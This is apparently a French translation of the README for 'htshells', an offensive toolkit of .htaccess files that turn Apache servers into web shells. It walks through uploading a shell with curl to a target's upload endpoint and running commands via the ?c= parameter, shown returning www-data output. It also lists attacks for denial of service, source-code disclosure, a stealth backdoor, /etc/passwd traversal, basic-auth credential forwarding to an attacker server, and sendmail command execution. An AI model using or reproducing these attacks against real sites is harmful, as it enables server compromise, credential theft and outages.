
Shells htaccess autonomes et attaques
HTSHELLS - Shells web autonomes et autres attaques via des fichiers .htaccess.
Les attaques sont nommées de la manière suivante, module.attack.htaccess et regroupées par type d'attaque dans des répertoires. Choisissez celle dont vous avez besoin et copiez-la dans un nouveau fichier nommé .htaccess, vérifiez le fichier pour voir si des modifications sont nécessaires avant de le téléverser. Les web shells exécutent les commandes à partir du paramètre de requête c, sauf si le fichier indique le contraire.
Pour préparer, exécutez ./prepare.sh file qui générera le fichier .htaccess
à téléverser. Exemple :
$ ./prepare.sh shell/mod_php.shell.htaccess
┬ ┬┌┬┐┌─┐┬ ┬┌─┐┬ ┬ ┌─┐
├─┤ │ └─┐├─┤├┤ │ │ └─┐
┴ ┴ ┴ └─┘┴ ┴└─┘┴─┘┴─┘└─┘
justanotherhacker.com
.htaccess file is ready
$ curl -F '[email protected]' -k https://target/upload.php
$ curl -k https://target/uploads/.htaccess?c=id
...
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
== DOS/ # Attaques par déni de service
apache.dos.htaccess Fait en sorte que toutes les requêtes renvoient une erreur interne 500
mod_rewrite.dos.htaccess La condition dos par expression régulière dans mod_rewrite consomme un processus enfant
== INFO/ # Attaques par divulgation d'informations
modcheck/ Inclut des en-têtes de réponse supplémentaires pour indiquer quels modules Apache sont actifs
mod_caucho.info.htaccess non testé Liaison du statut du serveur pour le module serveur Java mod_caucho Resin
mod_clamav.info.htaccess Liaison de la page de statut de Clamav
mod_info.info.htaccess Liaison des informations serveur pour Apache
mod_ldap.info.htaccess non testé Liaison du statut du serveur pour le module serveur mod_ldap
mod_perl.info.htaccess Affiche la page de statut de mod_perl
mod_php.info.htaccess Fait afficher la source de toutes les pages PHP au lieu de les exécuter
mod_status.info.htacces Liaison du statut du serveur pour Apache
== SHELL/ # Exécution interactive de commandes
mod_caucho.shell.htaccess non testé Web shell basé sur JSP
mod_cgi.shell.bash.htaccess Shell utilisant bash via le gestionnaire cgi. Nécessite que le drapeau exec soit défini sur le fichier htaccess.
mod_cgi.shell.windows.htaccess non testé Fournit un shell via php.exe en utilisant les directives de configuration cgi d'Apache
mod_include.shell.htaccess Web shell basé sur les Server Side Includes
mod_multi.shell.htaccess Plusieurs shells dans un seul fichier .htaccess, une attaque universelle
mod_perl.shell.htaccess incomplet TODO
mod_php.shell.htaccess Accès à un web shell basé sur PHP via http://domain/path/.htaccess?c=command
mod_php.shell2.htaccess Méthode alternative pour invoquer un shell PHP depuis un fichier .htaccess
mod_php.stealth.shell.htaccess Backdoor furtive basée sur PHP - voir http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html pour le tutoriel
mod_python.shell.htaccess
mod_ruby.shell.htaccess
mod_suphp.shell.htaccess
== TRAVERSAL/ # Attaques par traversée de répertoire
mod_hitlog.traversal.htaccess Attaque par traversée de répertoire via le module hitlog qui tente de lire /etc/passwd
mod_layout.traversal.htaccess Attaque par traversée de répertoire qui lit /etc/passwd
== ./ # Attaques diverses
mod_auth_remote.phish.htaccess non testé Transmet les identifiants d'authentification de base au serveur de votre choix
mod_badge.admin.htaccess Liaison de la page d'administration de mod_badge
mod_sendmail.rce.htaccess non testé Exécute les commandes configurées dans le fichier .htaccess en spécifiant le chemin et les arguments du binaire "sendmail"
Wireghoul - http://www.justanotherhacker.com